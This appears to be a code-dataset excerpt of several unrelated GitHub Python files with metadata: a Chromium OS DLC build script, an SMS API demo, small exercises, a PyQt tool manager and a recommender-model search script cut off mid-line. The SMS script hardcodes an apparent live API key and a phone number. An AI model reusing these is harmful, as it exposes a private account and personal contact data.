blocks):\n \"\"\"Return the content of imageloader.json file.\n\n Args:\n image_hash: (str) sha256 hash of the DLC image.\n table_hash: (str) sha256 hash of the DLC table file.\n blocks: (int) number of blocks in the DLC image.\n\n Returns:\n [str]: content of imageloader.json file.\n \"\"\"\n return {\n 'fs-type': self.fs_type,\n 'id': self.dlc_id,\n 'package': self.dlc_package,\n 'image-sha256-hash': image_hash,\n 'image-type': 'dlc',\n 'is-removable': True,\n 'manifest-version': self._MANIFEST_VERSION,\n 'name': self.name,\n 'pre-allocated-size': self.pre_allocated_blocks * self._BLOCK_SIZE,\n 'size': blocks * self._BLOCK_SIZE,\n 'table-sha256-hash': table_hash,\n 'version': self.version,\n }\n\n def GenerateVerity(self):\n \"\"\"Generate verity parameters and hashes for the image.\"\"\"\n with osutils.TempDir(prefix='dlc_') as temp_dir:\n hash_tree = os.path.join(temp_dir, 'hash_tree')\n # Get blocks in the image.\n blocks = math.ceil(\n os.path.getsize(self.dest_image) / self._BLOCK_SIZE)\n result = cros_build_lib.RunCommand(\n ['verity', 'mode=create', 'alg=sha256', 'payload=' + self.dest_image,\n 'payload_blocks=' + str(blocks), 'hashtree=' + hash_tree,\n 'salt=random'], capture_output=True)\n table = result.output\n\n # Append the merkle tree to the image.\n osutils.WriteFile(self.dest_image, osutils.ReadFile(hash_tree), 'a+')\n\n # Write verity parameter to table file.\n osutils.WriteFile(self.dest_table, table)\n\n # Compute image hash.\n image_hash = HashFile(self.dest_image)\n table_hash = HashFile(self.dest_table)\n # Write image hash to imageloader.json file.\n blocks = math.ceil(\n os.path.getsize(self.dest_image) / self._BLOCK_SIZE)\n imageloader_json_content = self.GetImageloaderJsonContent(\n image_hash, table_hash, int(blocks))\n with open(self.dest_imageloader_json, 'w') as f:\n json.dump(imageloader_json_content, f)\n\n def GenerateDLC(self):\n \"\"\"Generate a DLC artifact.\"\"\"\n # Create the image and copy the DLC files to it.\n self.CreateImage()\n # Generate hash tree and other metadata.\n self.GenerateVerity()\n\n\ndef CopyAllDlcs(sysroot, install_root_dir):\n \"\"\"Copies all DLC image files into the images directory.\n\n Copies the DLC image files in the given build directory into the given DLC\n image directory. If the DLC build directory does not exist, or there is no DLC\n for that board, this function does nothing.\n\n Args:\n sysroot: Path to directory containing DLC images, e.g /build/.\n install_root_dir: Path to DLC output directory,\n e.g. src/build/images//.\n \"\"\"\n output_dir = os.path.join(install_root_dir, 'dlc')\n build_dir = os.path.join(sysroot, DLC_IMAGE_DIR)\n\n if not os.path.exists(build_dir) or not os.listdir(build_dir):\n logging.info('There is no DLC to copy to output, ignoring.')\n return\n\n logging.info('Copying all DLC images to their destination path.')\n logging.info('Detected the following DLCs: %s',\n ', '.join(os.listdir(build_dir)))\n\n osutils.SafeMakedirs(output_dir)\n osutils.CopyDirContents(build_dir, output_dir)\n\n logging.info('Done copying the DLCs to their destination.')\n\ndef GetParser():\n \"\"\"Creates an argument parser and returns it.\"\"\"\n parser = commandline.ArgumentParser(description=__doc__)\n # This script is used both for building an individual DLC or copying all final\n # DLCs images to their final destination nearby chromiumsos_test_image.bin,\n # etc. These two arguments are required in both cases.\n parser.add_argument('--sysroot', type='path', metavar='DIR', required=True,\n help=\"The root path to the board's build root, e.g. \"\n \"/build/eve\")\n parser.add_argument('--install-root-dir', type='path', metavar='DIR',\n required=True,\n help='If building a specific DLC, it is the root path to'\n ' install DLC images (%s) and metadata (%s). Otherwise it'\n ' is the target directory where the Chrome OS images gets'\n ' dropped in build_image, e.g. '\n 'src/build/images//latest.' % (DLC_IMAGE_DIR,\n DLC_META_DIR))\n\n one_dlc = parser.add_argument_group('Arguments required for building only '\n 'one DLC')\n one_dlc.add_argument('--src-dir', type='path', metavar='SRC_DIR_PATH',\n help='Root directory path that contains all DLC files '\n 'to be packed.')\n one_dlc.add_argument('--pre-allocated-blocks', type=int,\n metavar='PREALLOCATEDBLOCKS',\n help='Number of blocks (block size is 4k) that need to'\n 'be pre-allocated on device.')\n one_dlc.add_argument('--version', metavar='VERSION', help='DLC Version.')\n one_dlc.add_argument('--id', metavar='ID', help='DLC ID (unique per DLC).')\n one_dlc.add_argument('--package', metavar='PACKAGE',\n help='The package ID that is unique within a DLC, One'\n ' DLC cannot have duplicate package IDs.')\n one_dlc.add_argument('--name', metavar='NAME',\n help='A human-readable name for the DLC.')\n one_dlc.add_argument('--fs-type', metavar='FS_TYPE', default=_SQUASHFS_TYPE,\n choices=(_SQUASHFS_TYPE, _EXT4_TYPE),\n help='File system type of the image.')\n return parser\n\n\ndef ValidateArguments(opts):\n \"\"\"Validates the correctness of the passed arguments.\n\n Args:\n opts: Parsed arguments.\n \"\"\"\n # Make sure if the intention is to build one DLC, all the required arguments\n # are passed.\n per_dlc_req_args = ('src_dir', 'pre_allocated_blocks', 'version', 'id',\n 'package', 'name')\n if (opts.id and\n not all(vars(opts)[arg] is not None for arg in per_dlc_req_args)):\n raise Exception('If the intention is to build only one DLC, all the flags'\n '%s required for it should be passed .' % per_dlc_req_args)\n\n if opts.fs_type == _EXT4_TYPE:\n raise Exception('ext4 unsupported, see https://crbug.com/890060')\n\n\ndef main(argv):\n opts = GetParser().parse_args(argv)\n opts.Freeze()\n\n ValidateArguments(opts)\n\n if opts.id:\n logging.info('Building DLC %s', opts.id)\n dlc_generator = DlcGenerator(src_dir=opts.src_dir,\n sysroot=opts.sysroot,\n install_root_dir=opts.install_root_dir,\n fs_type=opts.fs_type,\n pre_allocated_blocks=opts.pre_allocated_blocks,\n version=opts.version,\n dlc_id=opts.id,\n dlc_package=opts.package,\n name=opts.name)\n dlc_generator.GenerateDLC()\n else:\n CopyAllDlcs(opts.sysroot, opts.install_root_dir)\n","repo_name":"qinjidong/EasyChromium75","sub_path":"src/third_party/chromite/scripts/build_dlc.py","file_name":"build_dlc.py","file_ext":"py","file_size_in_byte":15210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"73173046932","text":"'''\nhttps://www.textlocal.in/free-developer-sms-api/\n'''\n \nimport urllib.request\nimport urllib.parse\n \ndef sendSMS(apikey, numbers, sender, message):\n data = urllib.parse.urlencode({'apikey': apikey, 'numbers': numbers,\n 'message' : message, 'test': 'true' })\n data = data.encode('utf-8')\n request = urllib.request.Request(\"https://api.textlocal.in/send/?\")\n f = urllib.request.urlopen(request, data)\n fr = f.read()\n return(fr)\n \nresp = sendSMS('NGI2YzU5NDYzOTc1Njk3NjMzNDMzODQyNTc0ZDc1NmU=', '+918447389366',\n 'Anubha', 'Hi there, thank you for sending your first test message from Textlocal. See how you can send effective SMS campaigns here: https://tx.gl/r/2nGVj/')\nprint (resp)","repo_name":"anubhavpatrick/sms-whatsapp-integration","sub_path":"sms_api_textlocal.py","file_name":"sms_api_textlocal.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10191994673","text":"import string\n\nprint(string.ascii_lowercase)\nprint(string.ascii_uppercase)\n'''\nlis1 = [0, 1, 2, 3]\nlis2 = [4, 5, 6, 7]\n\ntest1 = zip(lis1, lis2)\n# print(test1)\nd = dict()\nfor k,v in test1:\n d[k] = v\nprint(d)\n'''\nlower_list = list(string.ascii_lowercase)\n# print(lower_list)\n# list(range(1, 26+1))\n\nz = zip(lower_list, list(range(1, 26+1)))\nd = dict()\nfor k,v in z:\n d[k] = v\nprint(d)\nrev_d = {v:k for k,v in d.items()}\n# shift字母编号\nshift = 2\n\n'''\n# 约束在[1, 26]\nif result > 26:\n while result > 26:\n result -= 26\nif result < 1:\n while result < 1:\n result += 26\n'''\nword = \"apple\"\nnew_word = []\nfor letter in word:\n index = d[letter] # 索引值\n index += shift# 索引值加shift,加密\n if index > 26:\n while index > 26:\n index -= 26\n if index < 1:\n while index < 1:\n index += 26\n new_letter = rev_d[index]# 反查,变成密文\n new_word.append(new_letter)\n # str化\nnew_word = ''.join(c for c in new_word)\nprint(new_word)\n\nindex = d[letter] # 索引值\nindex += shift# 索引值加shift,加密\nif index > 26:\n while index > 26:\n index -= 26\nif index < 1:\n while index < 1:\n index += 26\nnew_letter = rev_d[index]# 反查,变成密文\n\n","repo_name":"KellyHwong/MIT.Intro.To.CS.Python","sub_path":"ps4/testZip.py","file_name":"testZip.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15510695021","text":"from PyQt6.QtCore import pyqtSignal, QObject\n\n\nclass DummyTool(object):\n \"\"\" For use in place of None checks in the code\n reduces boilerplate\n \"\"\"\n action_name = 'action_dummy_tool'\n\n def methodPrefix(self):\n return \"dummyTool\" # first letter should be lowercase\n\n def setActive(self, bool):\n pass\n\n def lastLocation(self):\n return None\n\n def setSelectionFilter(self, filter_name_list):\n pass\n\n\ndummy_tool = DummyTool()\n\n\nclass AbstractToolManager(QObject):\n \"\"\"Manages interactions between the slice widgets/UI and the model.\"\"\"\n\n def __init__(self, tool_group_name, window, viewroot):\n \"\"\"\n We store mainWindow because a controller's got to have\n references to both the layer above (UI) and the layer below (model)\n \"\"\"\n super(AbstractToolManager, self).__init__()\n self.window = window\n self.viewroot = viewroot\n self.document = window.document()\n self.tool_group_name = tool_group_name\n self._active_tool = dummy_tool\n self._active_part = None\n self.tool_names = None\n # end def\n\n ### SIGNALS ###\n activeToolChangedSignal = pyqtSignal(str)\n\n def installTools(self):\n if self.viewroot.manager is None:\n raise ValueError(\"Please call viewroot.setManager before calling installTools\")\n # Call installTool on every tool\n tnames = self.tool_names\n if tnames is None:\n raise ValueError(\"Please define tools_names of AbstractToolManager subclass\")\n for tool_name in tnames:\n self.installTool(tool_name)\n # end def\n\n def installTool(self, tool_name):\n window = self.window\n tgn = self.tool_group_name\n\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n if hasattr(window, action_name):\n tool_widget = getattr(window, action_name)\n else:\n tool_widget = None\n tool = getattr(self, l_tool_name + '_tool')\n tool.action_name = action_name\n\n set_active_tool_method_name = 'choose%sTool' % (tool_name)\n\n def clickHandler(self):\n if tool_widget is not None:\n tool_widget.setChecked(True)\n self.setActiveTool(tool)\n if hasattr(tool, 'widgetClicked'):\n if l_tool_name != 'select':\n self.document.clearAllSelected()\n tool.widgetClicked()\n # end def\n\n setattr(self.__class__, set_active_tool_method_name, clickHandler)\n handler = getattr(self, set_active_tool_method_name)\n if tool_widget is not None:\n tool_widget.triggered.connect(handler)\n return tool_widget\n # end def\n\n def deactivateAllTools(self):\n \"\"\" uncheck all tools in this group and set the active tool to None\n \"\"\"\n window = self.window\n tgn = self.tool_group_name\n if self._active_tool is not None:\n self._active_tool.setActive(False)\n for tool_name in self.tool_names:\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n tool_widget = getattr(window, action_name)\n tool_widget.setChecked(False)\n self._active_tool = dummy_tool\n # end def\n\n def destroy(self):\n window = self.window\n tgn = self.tool_group_name\n if self._active_tool is not None:\n self._active_tool.setActive(False)\n for tool_name in self.tool_names:\n l_tool_name = tool_name.lower()\n action_name = 'action_%s_%s' % (tgn, l_tool_name)\n tool_widget = getattr(window, action_name)\n set_active_tool_method_name = 'choose%sTool' % (tool_name)\n handler = getattr(self, set_active_tool_method_name)\n tool_widget.triggered.disconnect(handler)\n tool_widget.setChecked(False)\n self._active_tool = dummy_tool\n self.window = None\n # end def\n\n def activeToolGetter(self):\n return self._active_tool\n # end def\n\n def setActiveTool(self, new_active_tool):\n if new_active_tool == self._active_tool:\n return\n if new_active_tool is None:\n new_active_tool = dummy_tool\n\n if self._active_tool is not None:\n self._active_tool.setActive(False)\n\n self._active_tool = new_active_tool\n self._active_tool.setActive(True)\n self.activeToolChangedSignal.emit(self._active_tool.action_name)\n # end def\n\n def getFilterList(self):\n return self.document.filter_list\n# end class\n","repo_name":"douglaslab/cadnano2.5","sub_path":"cadnano/views/abstractitems/abstracttoolmanager.py","file_name":"abstracttoolmanager.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"4007956497","text":"# Tarefa 2\n\nfrom dino_runner.utils.constants import BIRD\nfrom dino_runner.components.obstacles.obstacle import Obstacle\n\nY_POS_BIRD = 250\n\nclass Bird(Obstacle):\n def __init__(self, images):\n self.type = 0\n self.image = BIRD\n\n super().__init__(images, self.type)\n \n self.rect.y = Y_POS_BIRD\n self.bird_index = 0\n\n def draw(self, screen):\n\n if self.bird_index < 5:\n self.image = 0\n else:\n self.image = 1\n \n screen.blit(self.images[self.image], (self.rect.x, self.rect.y))\n\n self.bird_index += 1\n\n if self.bird_index >= 10:\n self.bird_index = 0\n\n","repo_name":"Cleyton0ff/CM_BR-MOD2-T4","sub_path":"dino_runner/components/obstacles/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"7832961647","text":"import re\r\n\r\n# str = 'Cats are smarter than dogs'\r\n#\r\n# m1 = re.match(r'(.*)are(.*?).*', str)\r\n# print(m1)\r\n#\r\n# print(m1.group())\r\n# print(m1.group(0))\r\n# print(m1.groups(1))\r\n\r\nm = re.match('[abcd]','ab')\r\nprint(m)\r\n\r\na,b = [0,1]\r\nprint(f'a={a},b={b}')\r\n\r\ns = '(.*?)wow(0*?)'\r\n\r\n# m2 = re.match('hello','world hello')\r\n# print(m2)","repo_name":"Demon1630/python","sub_path":"正则表达式.py","file_name":"正则表达式.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72117873174","text":"import logging\n\n# 日志级别\n# 将信息打印到控制台上\n# logging.debug(u\"苍井空\")\n# logging.info(u\"麻生希\")\n# logging.warning(u\"小泽玛利亚\")\n# logging.error(u\"桃谷绘里香\")\n# logging.critical(u\"泷泽萝拉\")\n\n# 设置日志级别\n# logging.basicConfig(level=logging.NOTSET)\n\n# 部分名词解释\n# Logging.Formatter:这个类配置了日志的格式,在里面自定义设置日期和时间,输出日志的时候将会按照设置的格式显示内容。\n# Logging.Logger:Logger是Logging模块的主体,进行以下三项工作:\n# 1. 为程序提供记录日志的接口\n# 2. 判断日志所处级别,并判断是否要过滤\n# 3. 根据其日志级别将该条日志分发给不同handler\n# 常用函数有:\n# Logger.setLevel() 设置日志级别\n# Logger.addHandler() 和 Logger.removeHandler() 添加和删除一个Handler\n# Logger.addFilter() 添加一个Filter,过滤作用\n# Logging.Handler:Handler基于日志级别对日志进行分发,如设置为WARNING级别的Handler只会处理WARNING及以上级别的日志。\n# 常用函数有:\n# setLevel() 设置级别\n# setFormatter() 设置Formatter\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s') # logging.basicConfig函数对日志的输出格式及方式做相关配置\n# 由于日志基本配置中级别设置为DEBUG,所以一下打印信息将会全部显示在控制台上\nlogging.info('this is a loggging info message')\nlogging.debug('this is a loggging debug message')\nlogging.warning('this is loggging a warning message')\nlogging.error('this is an loggging error message')\nlogging.critical('this is a loggging critical message')\n\n# 日志输出-文件\nimport logging # 引入logging模块\nimport os.path\nimport time\n# 第一步,创建一个logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO) # Log等级总开关\n# 第二步,创建一个handler,用于写入日志文件\nrq = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\nlog_path = os.path.dirname(os.getcwd()) + '/Logs/'\nlog_name = log_path + rq + '.log'\nlogfile = log_name\nfh = logging.FileHandler(logfile, mode='w')\nfh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n# 第三步,定义handler的输出格式\nformatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\nfh.setFormatter(formatter)\n# 第四步,将logger添加到handler里面\nlogger.addHandler(fh)\n# 日志\nlogger.debug('this is a logger debug message')\nlogger.info('this is a logger info message')\nlogger.warning('this is a logger warning message')\nlogger.error('this is a logger error message')\nlogger.critical('this is a logger critical message')\n\n","repo_name":"heiheisenberg/chuangyeba_PythonSpider","sub_path":"辅助文件/logging_test.py","file_name":"logging_test.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"3734227484","text":"import os\nimport sys\nimport time\nimport argparse\nimport jsonlines\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\n\nfrom random import random\nfrom tqdm import trange\n\nfrom supersasrec import SuperSASRecModel\nfrom utils import *\n\nchoice = lambda x: x[np.random.randint(len(x))] if isinstance(\n x, list) else choice(list(x))\n\ndef str2bool(s):\n if s.lower() not in {'false', 'true'}:\n raise ValueError('Not a valid boolean string')\n return s.lower() == 'true'\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', required=True)\n parser.add_argument('--batch_size', default=256, type=int)\n parser.add_argument('--lr', default=0.001, type=float)\n parser.add_argument('--maxlen', default=50, type=int)\n parser.add_argument('--hidden_units', default=256, type=int)\n parser.add_argument('--num_layers', default=4, type=int)\n parser.add_argument('--num_heads', default=1, type=int)\n parser.add_argument('--dropout', default=0.5, type=float)\n parser.add_argument('--clip', default=5.0, type=float)\n parser.add_argument('--warmup_steps_rate', default=0.1, type=float)\n parser.add_argument('--sample_size', default=100, type=int)\n parser.add_argument('--device', default='cuda', type=str)\n parser.add_argument('--inference_only', default=False, type=str2bool)\n parser.add_argument('--state_dict_path', default=None, type=str)\n parser.add_argument('--is_save', default=False, type=str2bool)\n parser.add_argument('--weight_decay', default=0, type=float)\n parser.add_argument('--eval_interval', default=20, type=int)\n parser.add_argument('--eval_batch_size', default=512, type=int)\n parser.add_argument('--eval_set', default=-1, type=int) # number of the test set, negative value means all. It is ok to set it small to accelerate when searching\n\n parser.add_argument('--warmup_epochs', help='number of epochs when warmup training', default=200, type=int)\n parser.add_argument('--search_epochs', help='number of epochs when searching best lambdas', default=500, type=int)\n parser.add_argument('--population_num', help='population number', type=int, default=100)\n parser.add_argument('--select_num', help='select topk candidates', type=int, default=50)\n parser.add_argument('--m_prob', help='probability of crossover and mutation during evolution process', type=float, default=0.1)\n parser.add_argument('--crossover_num', help='crossover number', type=int, default=25)\n parser.add_argument('--mutation_num', help='mutation number', type=int, default=25)\n parser.add_argument('--seed', help='random seed during evolution', type=int, default=2022)\n parser.add_argument('--scale_factor', help='scale factor', type=float, default=0.5)\n parser.add_argument('--scale_decay_rate', help='scale decay rate', type=float, default=0.5)\n\n args = parser.parse_args()\n\n print(args)\n return args\n\nclass SearcherEvolution():\n def __init__(self, args):\n self.args = args\n # information that evolutional algorithm needs\n self.select_num = args.select_num\n self.warmup_epochs = args.warmup_epochs\n self.search_epochs = args.search_epochs\n self.population_num = args.population_num\n self.m_prob = args.m_prob\n self.crossover_num = args.crossover_num\n self.mutation_num = args.mutation_num\n self.num_layers = args.num_layers\n # generate dataset\n self.dataset = data_partition(args.dataset)\n\n [user_train, user_valid, user_test, usernum, itemnum] = self.dataset\n negative_sampler = PopularSampler(user_train, user_valid, user_test, usernum, itemnum, args.sample_size)\n num_batch = len(user_train) // args.batch_size # tail? + ((len(user_train) % args.batch_size) != 0)\n \n # sampler = WarpSampler(user_train, usernum, itemnum, batch_size=args.batch_size, maxlen=args.maxlen, n_workers=3)\n warp_dataset = WarpDataset(user_train, usernum, itemnum, args.maxlen)\n # train_sampler = torch.utils.data.distributed.DistributedSampler(warp_dataset)\n self.dataloader = DataLoader(warp_dataset, batch_size=args.batch_size, num_workers=4, shuffle=True)\n val_dataset = EvalDataset(user_train, user_valid, user_test, usernum, itemnum, args.maxlen, negative_sampler, mode='val', eval_set=args.eval_set)\n self.val_loader = DataLoader(val_dataset, batch_size=args.eval_batch_size, num_workers=4, shuffle=False)\n test_dataset = EvalDataset(user_train, user_valid, user_test, usernum, itemnum, args.maxlen, negative_sampler, mode='test', eval_set=args.eval_set)\n self.test_loader = DataLoader(test_dataset, batch_size=args.eval_batch_size, num_workers=4, shuffle=False)\n\n # search space\n self.block_choice = [0, 1]\n self.rec_choice = [0, 0.0001, 0.0005, 0.001, 0.005, 0.01]\n self.ind_choice = [0, 0.0001, 0.0005, 0.001, 0.0015, 0.002]\n self.rec_weights = [0 for _ in range(args.num_layers)]\n self.ind_weights = [0 for _ in range(args.num_layers)]\n self.lambda_choice = self.rec_choice + self.ind_choice\n\n # generate model\n self.model = SuperSASRecModel(usernum, itemnum, self.rec_choice, self.ind_choice, args).to(args.device)\n\n for name, param in self.model.named_parameters():\n try:\n torch.nn.init.xavier_normal_(param.data)\n except:\n pass # just ignore those failed init layers\n\n self.loss = torch.nn.BCEWithLogitsLoss()\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=args.lr, betas=(0.9, 0.999), weight_decay=args.weight_decay)\n\n # population info\n self.memory = []\n self.epoch = 0\n self.candidates = []\n self.keep_top_k = {self.select_num: []}\n self.vis_dict = {}\n\n # scale factor\n self.scale_factor = args.scale_factor\n self.scale_decay_rate = args.scale_decay_rate\n\n def _get_weight(self, choices, prob):\n '''\n prob is a value from [0, 1], means the weight for the auxiliary loss\n choices is actually a sampled point of the function that measures the loss weight and the prob\n after the prob is given, we get the final result through the sampled choices interpolation\n '''\n # prob = min(prob, 1-1e-10) # Prevent bugs, but this step is not required in probability\n split_value = 1 / (len(choices) - 1)\n idx = 0\n while(prob > split_value):\n idx += 1\n prob -= split_value\n relate_distance = prob / split_value\n return choices[idx] * (1 - relate_distance) + choices[idx + 1] * relate_distance\n\n def _set_choice(self, cand):\n # change cand to weight\n num_layers = int(len(cand) / 2)\n block_cand = []\n for i in range(0, 2 * num_layers, 2):\n rec = cand[i]\n ind = cand[i + 1]\n rec_weight = self._get_weight(self.rec_choice, rec)\n ind_weight = self._get_weight(self.ind_choice, ind)\n self.rec_weights[int(i/2)] = rec_weight\n self.ind_weights[int(i/2)] = ind_weight\n block_cand.append(rec_weight)\n block_cand.append(ind_weight)\n # set block\n self.model.set_choice(np.array(block_cand))\n\n def sample_random(self):\n res = list()\n for _ in range(self.args.num_layers):\n res.append(random.random())\n res.append(random.random())\n return res\n\n def stack_random_cand(self, random_func, *, batch_size=10):\n while True:\n cands = [random_func() for _ in range(batch_size)]\n for cand in cands:\n if str(cand) not in self.vis_dict:\n self.vis_dict[str(cand)] = {}\n info = self.vis_dict[str(cand)]\n for cand in cands:\n yield cand\n \n def get_cand_auc(self, cand):\n self._set_choice(cand)\n self.model.eval()\n t_valid, AUC = evaluate_loader(self.model, self.val_loader, self.args, 'val', ks=[10])\n self.vis_dict[str(cand)]['V_NDCG'] = float(t_valid[0][10])\n self.vis_dict[str(cand)]['V_HR'] = float(t_valid[1][10])\n self.vis_dict[str(cand)]['V_AUC'] = float(AUC)\n return float(AUC)\n\n def check_cand(self, cand):\n # assert isinstance(cand, list) and len(cand) == (self.num_layers * 2)\n if str(cand) not in self.vis_dict:\n self.vis_dict[str(cand)] = {}\n info = self.vis_dict[str(cand)]\n if 'visited' in info:\n return False\n info['visited'] = True\n info['auc'] = float(self.get_cand_auc(cand))\n return True\n \n def get_random(self, population_num):\n '''\n sample random candidates\n '''\n print('random select ......')\n cand_iter = self.stack_random_cand(self.sample_random)\n max_iter = (population_num - len(self.candidates) + 1) * 50\n while len(self.candidates) < population_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n self.candidates.append(cand)\n print(f'random {len(self.candidates)} / {population_num}')\n print(f'sample over ...... random_num = {len(self.candidates)}')\n\n def update_top_k(self, candidates, *, k, key, reverse=True):\n assert k in self.keep_top_k\n print(f'select top-{k} ...')\n t = self.keep_top_k[k]\n t += candidates\n t.sort(key=key, reverse=reverse)\n self.keep_top_k[k] = t[:k]\n\n def show_top_k(self, k):\n assert k in self.keep_top_k\n t = self.keep_top_k[k]\n for cand in t:\n info = self.vis_dict[str(cand)]\n if 'test_auc' not in info:\n self._set_choice(cand)\n self.model.eval()\n t_test, AUC = evaluate_loader(self.model, self.test_loader, self.args, mode='test', ks=[10])\n info['T_NDCG'] = float(t_test[0][10])\n info['T_HR'] = float(t_test[1][10])\n info['T_AUC'] = float(AUC)\n info['test_auc'] = float(AUC)\n \n def get_crossover(self, k, crossover_num):\n assert k in self.keep_top_k\n print('crossover ......')\n res = []\n max_iter = crossover_num * 10\n def random_func():\n c1 = choice(self.keep_top_k[k])\n c2 = choice(self.keep_top_k[k])\n return list(choice([i,j]) for i, j in zip(c1, c2))\n cand_iter = self.stack_random_cand(random_func)\n while len(res) < crossover_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n res.append(cand)\n print(f\"crossover {len(res)} / {crossover_num}\")\n print(f\"crossover over ...... crossover_num = {len(res)}\")\n return res\n \n def get_mutation(self, k, mutation_num, m_prob):\n '''\n mutation\n '''\n assert k in self.keep_top_k\n print('mutation ......')\n res = []\n max_iter = mutation_num * 10\n def random_func():\n # get top k candidates\n cand = list(choice(self.keep_top_k[k]))\n for i in range(self.num_layers * 2):\n if np.random.random_sample() < m_prob:\n cand2 = list(choice(self.keep_top_k[k]))\n cand3 = list(choice(self.keep_top_k[k]))\n mutation_value = cand[i] + self.scale_factor * (cand2[i] - cand3[i])\n cand[i] = min(1 - 1e-10, max(1e-10, mutation_value))\n return cand\n cand_iter = self.stack_random_cand(random_func)\n while len(res) < mutation_num and max_iter > 0:\n max_iter -= 1\n cand = next(cand_iter)\n if not self.check_cand(cand):\n continue\n res.append(cand)\n print(f'mutation {len(res)} / {mutation_num}')\n print(f\"mutation over ...... mutation_num = {len(res)}\")\n return res\n\n def _train_warmup(self):\n [user_train, user_valid, user_test, usernum, itemnum] = self.dataset\n for epoch in range(self.args.warmup_epochs):\n self.model.train()\n cand = self.sample_random()\n self._set_choice(cand)\n with tqdm.tqdm(self.dataloader) as t:\n for batch, _ in t:\n t.set_description(f\"Warmup: epoch {epoch + 1} / {self.args.warmup_epochs} \")\n u, seq, dec, pos, neg = batch # tuples to ndarray\n u, seq, dec, pos, neg = np.array(u), np.array(seq), np.array(dec), np.array(pos), np.array(neg)\n pos_logits, neg_logits, encoder_layer_input, decoder_layer_output, rec_layer_ind = self.model(u, seq, dec, pos, neg)\n pos_labels, neg_labels = torch.ones(pos_logits.shape, device=self.args.device), torch.zeros(neg_logits.shape, device=self.args.device)\n # print(\"\\neye ball check raw_logits:\"); print(pos_logits); print(neg_logits) # check pos_logits > 0, neg_logits < 0\n # print(pos_logits, neg_logits)\n self.optimizer.zero_grad()\n indices = np.where(pos != 0)\n loss = self.loss(pos_logits[indices], pos_labels[indices])\n loss += self.loss(neg_logits[indices], neg_labels[indices])\n # recon\n if len(encoder_layer_input) != 0 and len(encoder_layer_input) == len(decoder_layer_output):\n # MSE loss calculate the reconstruction loss\n for i in range(len(encoder_layer_input)):\n loss += self.rec_weights[i] * F.mse_loss(encoder_layer_input[i], decoder_layer_output[i])\n \n if self.args.num_heads > 1:\n # ind loss\n # generate label\n batch_size = rec_layer_ind[0].shape[0]\n label = torch.arange(self.args.num_heads)\n label = torch.tile(label, [batch_size * self.args.maxlen, 1]).to(self.args.device)\n # calculate loss\n for l in range(len(rec_layer_ind)):\n # rec_layer_ind[i] shape: [batch_size, maxlen, num_head, num_head]\n loss += self.ind_weights[i] * F.nll_loss(rec_layer_ind[l].view(batch_size * self.args.maxlen, self.args.num_heads, self.args.num_heads), label)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args.clip)\n self.optimizer.step()\n\n t.set_postfix(loss=loss.item())\n \n def search(self):\n print(f\"population_num = {self.population_num}, select_num = {self.select_num}, mutation_num = {self.mutation_num}, crossover_num = {self.crossover_num}\")\n print(f\"Now warmup supernet ... The warmup epoch is {self.warmup_epochs}\")\n self._train_warmup()\n # save checkpoint\n os.makedirs('./checkpoint', exist_ok=True)\n torch.save(self.model.state_dict(), './checkpoint/super.pth')\n print(f\"Now search the candidates ... The max epoch is {self.search_epochs}\")\n # init population\n self.get_random(self.population_num)\n with trange(self.search_epochs) as t:\n for s_epoch in t:\n self.epoch += 1\n self.memory.append([])\n for cand in self.candidates:\n self.memory[-1].append(cand)\n\n # update top k\n self.update_top_k(\n self.candidates, k=self.select_num, key=lambda x:self.vis_dict[str(x)]['auc']\n )\n # now get mutation and crossover\n mutation = self.get_mutation(\n self.select_num,\n self.mutation_num,\n self.m_prob\n )\n crossover = self.get_crossover(\n self.select_num,\n self.crossover_num\n )\n self.candidates = mutation + crossover\n self.get_random(self.population_num)\n # save top_k\n os.makedirs('./res', exist_ok=True)\n with jsonlines.open(f'./res/res_{self.args.dataset}_lr_{self.args.lr}_reg_{self.args.weight_decay}_warm_{self.args.warmup_epochs}_search_{self.args.search_epochs}_layers_{self.args.num_layers}_select_{self.args.select_num}_population_{self.args.population_num}_cross_{self.args.crossover_num}_mutation_{self.args.mutation_num}.jsonl', mode='w') as writer:\n t = self.keep_top_k[self.select_num]\n for cand in t:\n info = self.vis_dict[str(cand)]\n self._set_choice(cand)\n info['cand'] = str(cand)\n info['rec'] = str(self.rec_weights)\n info['ind'] = str(self.ind_weights)\n writer.write(info)\n\ndef set_rng_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\ndef main():\n args = parse_args()\n set_rng_seed(args.seed)\n Searcher = 